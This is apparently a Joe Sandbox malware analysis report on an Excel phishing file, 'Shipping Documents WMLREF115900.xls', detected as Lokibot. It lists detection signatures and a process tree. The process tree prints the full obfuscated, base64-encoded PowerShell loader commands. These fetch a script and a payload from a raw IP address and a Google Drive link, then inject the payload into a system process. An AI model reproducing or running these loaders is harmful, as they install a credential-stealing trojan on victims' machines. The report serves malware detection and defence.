Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping Documents WMLREF115900.xls

Overview

General Information

Sample name:Shipping Documents WMLREF115900.xls
Analysis ID:1540834
MD5:98502d8342f1afd8b699b26ff777a919
SHA1:0d0c6a6f90611fee9c232d90fca0776dbbff5241
SHA256:40bcfababa169393524d58a9447ea465ac7a18edd09ae9eaea2739c8d77dab9d
Tags:xlsuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3484 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3568 cmdline: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3772 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3780 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A69.tmp" "c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 4000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • AddInProcess32.exe (PID: 3496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
    • mshta.exe (PID: 2600 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 2464 cmdline: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 1692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3104 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 2716 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC2.tmp" "c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 4000JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 4000INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x5bae:$b2: ::FromBase64String(
      • 0x61fc:$b2: ::FromBase64String(
      • 0x7322:$b2: ::FromBase64String(
      • 0x1ebab:$b2: ::FromBase64String(
      • 0x27d13:$b2: ::FromBase64String(
      • 0x2acae:$b2: ::FromBase64String(
      • 0x2b2fd:$b2: ::FromBase64String(
      • 0x38a90:$b2: ::FromBase64String(
      • 0x390bf:$b2: ::FromBase64String(
      • 0x580b7:$b2: ::FromBase64String(
      • 0x5881c:$b2: ::FromBase64String(
      • 0x699e7:$b2: ::FromBase64String(
      • 0x6a8a5:$b2: ::FromBase64String(
      • 0x6bd12:$b2: ::FromBase64String(
      • 0x6c1b3:$b2: ::FromBase64String(
      • 0x6c616:$b2: ::FromBase64String(
      • 0x84937:$b2: ::FromBase64String(
      • 0x6a66e:$b3: ::UTF8.GetString(
      • 0x6bb0f:$b3: ::UTF8.GetString(
      • 0x6bfb8:$b3: ::UTF8.GetString(
      • 0x6c41d:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 3560JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
